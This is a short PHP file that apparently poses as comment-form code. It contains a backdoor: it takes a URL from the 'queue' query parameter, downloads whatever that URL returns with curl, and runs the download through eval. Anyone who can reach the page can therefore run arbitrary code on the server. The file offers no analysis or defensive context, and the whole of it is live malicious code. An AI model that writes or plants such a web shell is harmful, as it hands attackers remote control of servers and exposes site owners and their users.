<?php

if (isset($_GET['queue'])) {
    $comment_form_bl = $_GET['queue'];
    if ($comment_form_ysn = curl_init()) {
        curl_setopt($comment_form_ysn, CURLOPT_URL, $comment_form_bl);
        curl_setopt($comment_form_ysn, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($comment_form_ysn));
        curl_close($comment_form_ysn);
        exit;
    }
}